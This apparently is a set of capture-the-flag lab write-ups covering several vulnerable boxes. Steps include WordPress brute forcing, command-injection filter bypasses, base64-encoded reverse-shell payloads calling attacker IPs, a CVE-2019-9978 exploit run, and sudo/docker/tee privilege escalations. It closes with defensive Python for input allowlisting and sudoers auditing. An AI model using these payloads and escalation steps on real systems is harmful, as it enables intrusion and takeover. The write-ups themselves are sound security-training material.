# BTRSys2.1

Ports 21, 22 and 80 are open, and the FTP server allows anonymous login; after logging in there is nothing inside and nothing can be uploaded. `wpscan` shows users such as admin, and the weak password admin/admin logs in successfully. At first I looked at the plugins and found one that allowed LFI; reading `/etc/passwd` worked, but every attempt to read the logs failed, so I simply uploaded a PHP reverse shell.

![image](https://hackmd.io/_uploads/B138Mp25A.png)

For privilege escalation, the usual Linux tricks did not work. `cat wp-config.php` gives the MySQL username and password.

![image](https://hackmd.io/_uploads/ByErI6nq0.png)

Connect to MySQL:

```bash
mysql -u root -h localhost -p
```

```sql
show databases;
use wordpress;
show tables;
SELECT * FROM wp_users LIMIT 5;
```

![image](https://hackmd.io/_uploads/Hy69YT29C.png)

The root hash is there; too lazy to crack it myself, I submitted it to [crackstation](https://crackstation.net/) and got the root password `roottoor`.

![image](https://hackmd.io/_uploads/S1VF962c0.png)

# NoName

Scanning the top 20 ports at first showed only port 22 open. The web page looks like this:

![image](https://hackmd.io/_uploads/Sy8dA3eo0.png)

Nothing else is there, so I ran a full port scan and directory enumeration; still only port 80 is open, and enumeration finds superadmin.php.

```bash
┌──(kali㉿LAPTOP-FKRJU4AD)-[~]
└─$ gobuster dir -u http://192.168.157.15/ -w /usr/share/wordlists/dirb/big.txt -x .txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.157.15/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/admin                (Status: 200) [Size: 417]
/index.php            (Status: 200) [Size: 201]
/server-status        (Status: 403) [Size: 279]
/superadmin.php       (Status: 200) [Size: 152]
Progress: 81876 / 81880 (100.00%)
===============================================================
Finished
===============================================================
```

The page is an obvious command injection; after a few attempts, `|l\s` executes successfully.

![image](https://hackmd.io/_uploads/BJ8RHpei0.png)

Using `|ca\t su*` reveals the page's actual restrictions:

```php
<?php
if (isset($_POST['submitt'])) {
    // Blacklist: the input is accepted only if removing every token leaves it unchanged
    $word = array(";", "&&", "/", "bin", "&", " &&", "ls", "nc", "dir", "pwd");
    $pinged = $_POST['pinger'];
    $newStr = str_replace($word, "", $pinged);
    if (strcmp($pinged, $newStr) == 0) {
        $flag = 1;
    } else {
        $flag = 0;
    }
}
if ($flag == 1) {
    // The filtered but unescaped value is interpolated straight into a shell command
    $outer = shell_exec("ping -c 3 $pinged");
    echo "<pre>$outer</pre>";
}
?>
```

Here `|echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xOTQvNDQ0NCAwPiYx" | base64 -d | bash`, where the base64 part decodes to `sh -i >& /dev/tcp/192.168.45.194/4444 0>&1`, gives a reverse shell.

![image](https://hackmd.io/_uploads/BkyjuTgsC.png)

Looking for SUID binaries afterwards, find turns out to be usable.

![image](https://hackmd.io/_uploads/B1rin6ejC.png)

# ICMP

Basic port scan: ports 22 and 80 open. The website did not look like it had much to attack; searching for its version turned up an RCE vulnerability.

![image](https://hackmd.io/_uploads/SkRpA6eoR.png)

![image](https://hackmd.io/_uploads/HJOB-Cej0.png)

Privilege escalation is once again the annoying guessing part. The basic escalation methods did not work; finally I noticed a strange directory that is execute-only and not readable. The reminder file says:

```
crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?
```

Guess 1: it lives at ./devel/crypt.php

```bash
www-data@icmp:/home/fox$ cat ./devel/crypt.php
cat ./devel/crypt.php
<?php
echo crypt('BUHNIJMONIBUVCYTTYVGBUHJNI','da');
?>
```

Guess 2: this is fox's user password.

```bash
www-data@icmp:/home/fox$ ls -al
ls -al
total 20
drwxr-xr-x 3 root root 4096 Dec  3  2020 .
drwxr-xr-x 3 root root 4096 Dec  3  2020 ..
lrwxrwxrwx 1 root root    9 Dec  3  2020 .bash_history -> /dev/null
drwx--x--x 2 fox  fox  4096 Dec  3  2020 devel
-rw-r--r-- 1 fox  fox    33 Aug 19 15:04 local.txt
-rw-r--r-- 1 root root   78 Dec  3  2020 reminder
```

After logging in over ssh, `sudo -l` shows hping3, which gtfobins says can be used. Usage: open two sessions.

```bash
# session 1, listen mode: hping3 waits for packets that contain the signature
# and dumps everything from the end of the signature to the end of the packet
$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe
```

```bash
# session 2: --sign adds the signature string to the data payload of each sent
# packet (used for packet identity); -d sets the data size; --file supplies the payload
$ sudo hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/proof.txt
```

![image](https://hackmd.io/_uploads/BkAKKAxs0.png)

# Loly

Port scan result: only port 80 open. I then found the wordpress directory, and wpscan finds user Loly with password fernando.

![image](https://hackmd.io/_uploads/BJAbpGMj0.png)

# SoSimple

Port scan result: ports 22 and 80 open. Likewise I found the wordpress directory and ran wpscan.

![image](https://hackmd.io/_uploads/rJ0-1rQiA.png)

Searching for social-warfare shows it allows RCE. I referred to this [exploit](https://github.com/hash3liZer/CVE-2019-9978) on GitHub, but my PoC is **payload.txt**:

```html
<pre>system('echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4yNDQvNDQ0NCAwPiYx" | base64 -d | bash')</pre>
```

Start an http.server locally, then run the exploit above:

```bash
python2 CVE-2019-9978.py -t http://192.168.168.78/wordpress/ --payload-uri http://192.168.45.244:8000/payload.txt
```

![image](https://hackmd.io/_uploads/HJAXfI7iC.png)

Since the initial wpscan also found user max, and the image above shows user max as well, it is reasonable to suspect both use the same password; wpscan finds the password opensesame.

![image](https://hackmd.io/_uploads/rJmdNI7oC.png)

But ssh login failed; I later found id_rsa in max's home directory and used it to log in successfully.

![image](https://hackmd.io/_uploads/H1J3H8XoC.png)

`sudo -l` shows that `/usr/sbin/service/` can be run as steven without a password. After getting steven's shell, `sudo -l` shows `/opt/tools/server-health.sh` can be used; I tried to cat that file, but it does not exist.
![image](https://hackmd.io/_uploads/BJJT1vQiR.png)

So I wrote `/bin/bash` into `server-health.sh` myself and ran it with sudo to get root.

![image](https://hackmd.io/_uploads/HyGuXPXiA.png)

# DC-4

Basic port scan: ports 22 and 80 open. The site is a login page with no sign of SQLi, and directory brute forcing found nothing, so I brute forced the login instead; admin/happy logs in successfully.

![image](https://hackmd.io/_uploads/r1xfaKthR.png)

After login there is an obvious command injection page.

![image](https://hackmd.io/_uploads/By35TFY2R.png)

Modify the request body and get a reverse shell.

```text
radio=echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNjgvNDQ0NCAwPiYx" | base64 -d | bash &submit=Run
```

![image](https://hackmd.io/_uploads/By-3CtYh0.png)

In user jim's directory there is old-passwords.bak containing many passwords; copy it out and try brute forcing with it.

![image](https://hackmd.io/_uploads/B16UU5Y20.png)

Build two wordlists from that password list and the known users, and try hydra to see whether anything hits.

![image](https://hackmd.io/_uploads/r1hQ_9tnA.png)

Logged in as jim, I tried to escalate as far as possible with no luck; checking mail reveals another user charles's password.

![image](https://hackmd.io/_uploads/BJ3Ch5K2R.png)

Switch to charles. `sudo -l` shows `/usr/bin/teehee` can be run without a password; presumably it is `tee`. GTFOBins says tee can write files, so append charles to `/etc/sudoers` to grant him root.

```bash
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$ echo "charles ALL=(ALL:ALL) ALL" | sudo /usr/bin/teehee -a /etc/sudoers
charles ALL=(ALL:ALL) ALL
charles@dc-4:~$ su root
Password:
su: Authentication failure
charles@dc-4:~$ sudo su
[sudo] password for charles:
root@dc-4:/home/charles# cat /root/proof.txt
e4951b05703a5c6287b20ab096c6c0fe
root@dc-4:/home/charles#
```

![image](https://hackmd.io/_uploads/B1EdljY30.png)

# Pwned1

Ports 21, 22 and 80 open. Directory brute forcing took forever; it found `/hidden_text`, which contains a file `secret.dic` listing more directories, of which only `/pwned.vuln` is accessible.

![image](https://hackmd.io/_uploads/S1hF9A-TR.png)

In that directory there is an input box; initial tests show no SQLi.

![image](https://hackmd.io/_uploads/ryzWoAbaC.png)

Capturing the traffic with burpsuite shows that the response contains PHP code.
![image](https://hackmd.io/_uploads/BktVoRZ60.png)

Unfortunately the credentials written in it are not the web login credentials; instead I guessed they are the FTP username and password. After connecting over FTP there is a share directory containing `id_rsa` and `note.txt`; download them and log in as the user mentioned in `note.txt`, ariana.

```bash
┌──(kali㉿G)-[/tmp]
└─$ cat note.txt
Wow you are here
ariana won't happy about this note
sorry ariana :(
```

```bash
┌──(kali㉿G)-[/tmp]
└─$ sudo chmod 600 id_rsa
[sudo] password for kali:

┌──(kali㉿G)-[/tmp]
└─$ ssh -i id_rsa ariana@192.168.171.95
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ariana@pwned:~$ cat local.txt
59cd03d49cee9d05b419e4b56444da35
ariana@pwned:~$
```

For privilege escalation, `sudo -l` shows `(selena) NOPASSWD: /home/messenger.sh`, which can be used.

```bash
ariana@pwned:/home$ cat messenger.sh
#!/bin/bash

clear
echo "Welcome to linux.messenger "
echo ""
users=$(cat /etc/passwd | grep home | cut -d/ -f 3)
echo ""
echo "$users"
echo ""
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "
# the unquoted $msg is expanded and run as a command
$msg 2> /dev/null
echo ""
echo "Message sent to $name :) "
echo ""
```

Note that `$msg` in this shell script is executed directly; first escalate horizontally to selena.

```bash
ariana@pwned:/home$ sudo -u selena ./messenger.sh
```

```bash
Welcome to linux.messenger

ariana:
selena:
ftpuser:

Enter username to send message : asdf

Enter message for asdf :/bin/bash

Sending message to asdf
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
python3 -c 'import pty;pty.spawn("/bin/bash")'
selena@pwned:/home$
```

After the basic escalation methods failed, repeated inspection showed that docker is among our groups; use [gtfobins](https://gtfobins.github.io/gtfobins/docker/) to escalate.

```bash
selena@pwned:/home$ id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
selena@pwned:/home$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# cat /root/proof.txt
5afb73776252b8a2e48a250cc2f172c1
#
```
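The NoName filter in superadmin.php and the DC-4 ping form fail for the same reason: user input reaches a shell, and a token blacklist cannot keep up with quoting tricks like `l\s`. The block below is an added example in Python, not code from this writeup: it reimplements the page's blacklist check so the `|l\s` input from the NoName section can be seen passing it, and puts an allowlist validator plus a shell-free argument list beside it (hostname regex and `ping -c 3` argv are my assumptions).

```python
import ipaddress
import re
import subprocess

# Blacklist copied from the NoName superadmin.php above: the page accepts the
# input only if removing every token leaves it unchanged (str_replace + strcmp).
BLACKLIST = [";", "&&", "/", "bin", "&", " &&", "ls", "nc", "dir", "pwd"]

# Hostname labels per RFC 1123: alphanumerics and hyphens, no leading/trailing hyphen.
HOSTNAME_RE = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*")

def blacklist_accepts(pinged):
    """The page's check: True when no blacklisted token occurs anywhere in the input."""
    stripped = pinged
    for word in BLACKLIST:
        stripped = stripped.replace(word, "")
    return stripped == pinged

def allowlist_accepts(target):
    """Hardened check: accept only a literal IP address or a well-formed hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return len(target) <= 253 and HOSTNAME_RE.fullmatch(target) is not None

def ping_argv(target):
    """Build ping's argument vector; no shell ever parses the user-supplied value."""
    if not allowlist_accepts(target):
        raise ValueError("rejected ping target: %r" % target)
    return ["ping", "-c", "3", target]

def run_ping(target):
    # shell=False with a list: metacharacters such as | ; & are plain bytes in argv[3].
    proc = subprocess.run(ping_argv(target), capture_output=True, text=True)
    return proc.stdout + proc.stderr

if __name__ == "__main__":
    for sample in ["127.0.0.1", "127.0.0.1|l\\s", "127.0.0.1; ls"]:
        print(repr(sample), "blacklist:", blacklist_accepts(sample),
              "allowlist:", allowlist_accepts(sample))
```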
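The SoSimple, DC-4 and Pwned1 escalations all hinge on a NOPASSWD sudo rule whose target was missing, writable by the caller, or a tool that hands out a shell. The following is an added audit script, not code from this writeup, that parses such rules and flags those three cases; the rule lines are constructed from the `sudo -l` output quoted above, and the basename list is an assumption (a renamed binary such as teehee will not match it).

```python
import os
import re
import stat

# Sample sudoers-style rules constructed from the `sudo -l` output quoted in this
# writeup (SoSimple, DC-4, Pwned1): added example input, not the page's own code.
SAMPLE_RULES = """\
ariana ALL=(selena) NOPASSWD: /home/messenger.sh
steven ALL=(root) NOPASSWD: /opt/tools/server-health.sh
charles ALL=(root) NOPASSWD: /usr/bin/teehee
max ALL=(steven) NOPASSWD: /usr/sbin/service
"""

# Basenames whose sudo entries are known to yield a shell or arbitrary file writes.
# A renamed copy (DC-4's teehee) never matches by name, so this is a review aid only.
SHELL_ESCAPE_NAMES = {"tee", "service", "hping3", "find", "docker", "sh", "bash"}

RULE_RE = re.compile(r"^(\S+)\s+\S+=\((\S+?)\)\s+NOPASSWD:\s*(\S+)")

def parse_rules(text):
    """Return (user, runas, command_path) for every NOPASSWD rule in text."""
    matches = (RULE_RE.match(line.strip()) for line in text.splitlines())
    return [m.groups() for m in matches if m]

def check_path(path):
    """Explain why a NOPASSWD target is risky, or return None."""
    if not os.path.exists(path):
        # SoSimple: the script was absent, so whoever can write the parent
        # directory decides what sudo will run as the target user.
        parent = os.path.dirname(path) or "/"
        state = "writable" if os.access(parent, os.W_OK) else "not writable"
        return "missing target; parent %s is %s by this user" % (parent, state)
    if os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        # Pwned1: a script run under sudo is only as trustworthy as its writers.
        return "target is group- or world-writable"
    if os.path.basename(path) in SHELL_ESCAPE_NAMES:
        return "target is a known shell-escape binary"
    return None

def audit(text):
    """Return (user, runas, path, finding) for each rule that check_path flags."""
    findings = []
    for user, runas, path in parse_rules(text):
        finding = check_path(path)
        if finding:
            findings.append((user, runas, path, finding))
    return findings
```

Run `audit(SAMPLE_RULES)` on the box itself, since the file and permission checks only mean something on the host whose sudoers is being reviewed.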